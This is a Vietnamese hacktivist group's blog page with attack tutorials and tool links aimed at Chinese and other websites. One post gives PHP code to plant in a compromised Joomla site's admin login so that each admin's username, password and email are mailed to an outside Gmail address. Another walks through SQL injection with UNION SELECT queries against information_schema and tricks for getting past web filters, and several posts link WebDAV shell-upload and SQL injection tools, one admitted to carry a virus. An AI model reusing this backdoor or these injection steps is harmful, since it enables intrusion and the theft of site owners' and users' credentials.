Chúng Tôi Là Át Chủ Bài


Trang DF by Gin

Lấy đc của anh Shu cũng hay hay. Đem về edit thêm tí là ngon luôn. Đây là demo: http://truongcan.p.ht/
Link down: http://www.mediafire.com/download/g3098750fx5mj5g/index.html

Xem Thêm
Người đăng: Unknown vào lúc 00:21 0 nhận xét

 

#OpChina

##########################################
# Fuck China                                      
# Fuck 1937cn Team
# Thời gian: 2/9/2013
# OpChina by Át Chủ Bài
##########################################                    

Xem Thêm
Người đăng: Unknown vào lúc 21:04 5 nhận xét

 

[Tut] Chèn Keylogger vào joomla



Bước 1: Up shell lên site joomla




Bước 2: Insert mã độc vào code




- Vào administrator/components/com_login/




- Edit file: admin.login.php




- Tìm dòng:$mainframe->redirect('index.php');




- Thêm trước dòng này 1 đoạn code như sau:

Quote:
$db =& JFactory::getDBO();
$mailfrom = $mainframe->getCfg( 'mailfrom' );
$fromname = $mainframe->getCfg( 'fromname' );
$siteURL = JURI::base();
$uname = $credentials['username'];
$query = 'SELECT name , email, usertype ' .
' FROM #__users' .
' WHERE username = "'.$uname.'"';
$db->setQuery( $query );
$rows = $db->loadObject();

if ( ! $mailfrom || ! $fromname ) {
$fromname = $rows->name;
$mailfrom = $rows->email;
}
$usertype = $rows->usertype;
$email = $rows->email;
$pass = $credentials['password'];

$message = "$uname|$email|$pass|$usertype";
$to="mailinfo17@gmail.com";
$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";
@mail($to, $siteURL, $message, $header);
Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: mailinfo17@gmail.com

Xem Thêm
Người đăng: Unknown vào lúc 05:08 0 nhận xét

 

[TOOLS] BUG WEBDAV

- Đây là 1 soft dùng khai thác bug webdav tự động :) rất tiện dụng :) các AnonyMous VN có thể sử dụng để Hack các site china
- Bug WebDav là một lỗi nghiêm trọng mà đa số các site Trung Quốc bị :)



- Cách sử dụng :
- Down phần mềm :  http://www.mediafire.com/?b8rg1rq777fc573 (Tools cũng có virut nhé bà con nên dùng ở net là an toàn :P hoặc cài đóng băng nhé :>) 
Còn đây là video clip : http://www.youtube.com/watch?v=ESyF_RPR9vI

- Sau khi open chọn WebDav ( Asp Shell Maket )


- Searang !! - > Tìm lỗi bug trong trang web đó
- Setting  !! -> Phần chỉnh sữa code có thể để vào code Shell tùy bạn :)
- Add Site !! -> Add site lỗi vào

- Sau khi có site lỗi bạn add site lỗi vào rồi chọn setting có thể chỉnh v.v.v. rồi ăn Searang là ok
!

Xem Thêm
Người đăng: Unknown vào lúc 05:07 0 nhận xét

 

[TOOL] Dò table với lỗi JET DATABASE

TOOL dò TABLE của lỗi JET of SQL INJECTION.
(Lỗi JET mà ngồi mò table thì hơi bị cực,nên xài soft cho lẹ,hj`hj`).
Nếu pro nào có rồi thì thôi,em chỉ hỗ trợ Newbie (như em) thôi.
**HƯỚNG DẨN :- Đơn giản vô cùng,giải nén và chạy file "JetSQL.exe" để Dò
-  Sát bên có file "tablename.txt" để chứa tên các table mà nó sẽ dò (bạn có thể sưu tầm thêm tables bỏ vào đó).
LINK : http://www.mediafire.com/?33gwbbs956h7w3r

Xem Thêm
Người đăng: Unknown vào lúc 05:05 0 nhận xét

 

Hướng Dẫn bug SQL và khắc phục khi gặp lỗi !

1.Bước đầu tiên trong khi khai thác SQL chính là tìm lỗi:Có các cách tìm lỗi sau :
- Thêm dấu ' vào trang web trả về :

Quote:
Quote: You have an error in your SQL syntax,supplied argument is not a valid MySQL
Quote:
Quote:
warning mysql_num_rows supplied argument is not a valid mysql result resource
Thì chắc chắn là trang web đã bị lỗi SQL
-Thêm dấu ' vào , trang web trả về trang trắng hoặc một phần của trang thì nguy cơ trang đó dính lỗi là rất cao --> thử khai thác tiếp
-Thêm and 1=1 và 1=0 , trang web trả về trang trắng hoặc một phần -> dính lỗi
2.Tìm số field,column:Ta sử dụng câu lệnh order by để tính số field , số column trong cơ sở dữ liệu SQL
Để tiết kiệm thời gian các bạn order by để xác định khoảng rồi tìm ra số column
-Nếu order by 100-- - mà trang web đưa về lỗi
Quote:
Quote:
Error: Unknown column '100' in 'order clause'
Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Thì các bạn tiếp tục giảm dần xác định khoảng rồi tìm ra
-Nếu order by 100-- - mà nó vẫn ra nguyên trang ban đầu thì các bạn thử thêm dấu ' sau phần id xem , nếu nó ra lỗi thì tiếp tục giảm dần để xác định khoảng
-Nếu cả 2 cách trên không được thì bạn ko dùng order by nữa , chuyển sang union select để tìm luôn ( cách này hơi mất thời gian )
3.Tìm số lỗi:Bạn dùng lệnh union select để tìm ra số lỗi .
-Nếu nó hiện ra số lỗi bình thường thì các bạn tiếp tục khai thác thôi
-Nếu nố không hiện ra số lỗi thì các bạn có thể thực một trong các cách sau :
+Viewsource để tìm số lỗi
+Xem các hình ảnh để tìm số
+Thay các column bằng null : null,null,null
+Thấy số id bằng null hoặc false
+Một số trường hợp khi bạn bỏ dấu - trước số đi lại có thể thấy số lỗi
+Dùng + hoặc alt + 255 thay cho dấu cách , viết hoa UNION SELECT
4.Khai thác

-Get thông tin về user , data , version
+Các bạn get version để biết hướng khai thác (MySQL ver 4 hoặc 5) : version() hoặc @@version hoặc có thể là convert(version() using latin1)
+Get user vầ database tương tự
-Get table và column
+Gat table : đối với MySQL 4 thì ta chỉ có thể đoán , mình đang tổng hợp lại các table và column hay dùng , còn đối với MySQL 5 thì chúng ta khai thác như sau
union select unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema=datase()
+Get column : UNION SELECT GROUP_CONCAT(COLUMN_ NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME=0xtable_name
Convert table_name sang hex hoặc cũng có thể dùng CHAR(...)

5.By pass

-Khi query một số site nó chặn các hàn union , select , convert ,.... thì khi query nó trả về trang trắng , lúc này ta thấy đổi bằng các chữ hoa thường xen kẽ nhau :uNiOn , SeLeCt ,CoNvErT ,....
-Khi query nó trả về lỗi

Quote:
Quote:
Forbidden
You don't have permission to access /... on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
hoặc
Quote:
Quote:
Not Acceptable
An appropriate representation of the requested resource / could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request
thì ta thay thế union hoặc select bởi /*union*/ hoặc /*!union*/ ( /*select*/ hoặc /*!select*/)

-Khi query nó trả về lỗi

Quote:
Quote:
406 Not Acceptable
This request is not acceptable Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!
thì ta thay thế space bởi %0A
-Khi query nó trả về lỗi
Quote:
Quote:
Error 500: Internal Server Error
The server encountered an unexpected condition which prevented it from fulfilling the request.
The problem is on the server side, not with your browser or the address. Most probably, a certain service (e.g., Tomcat engine) is down. Please contact your webmaster.
thì các bạn query id=.. and (select 1)=(select 0xAAAAAAAAAAAAAAAA 1000 A nhé) union select 1,2,3....

Xem Thêm
Người đăng: Unknown vào lúc 05:02 0 nhận xét

 

Tut Hướng dẫn khai thác web lỗi + hack = panglogin

Anh em bắt đầu bật Panglogin lên nào
Anh em vào TOol > vào Injection Digger nha ! Xong nó sẽ hiện lên thế này
Tools panglogin có cái hay là seach từ khóa của anh em cho vào rồi nó tự động seach + check xem site đó có lỗi hay ko  > có lỗi thì nó sẽ hiện dấu X màu đỏ






























Khi ra được column rồi > anh em chọn những column nào cần get ra > click vào data để get nha > bước cuối cùng là save  > có chữ save ở đó rồi 

Những website nào anh em ko đá được anh em thử cho sang thằng sqlhelpper v2.7 nha > Flo thường sài 2 tools này để chiến ^^

Tại mấy bạn cứ bắt mình làm nên rảnh làm tý thui , gọi là làm cho những newbie như mình sài 
Anh em lưu ý nha ! ở file tables.txt và columns.txt anh em có thể thêm những tables or columns mà tools ko hỗ trợ 

Xem Thêm
Người đăng: Unknown vào lúc 04:55 1 nhận xét

 
Đăng ký: Bài đăng (Atom)

Copyright © Group Át Chủ Bài / Template by :Template X5- ShaDow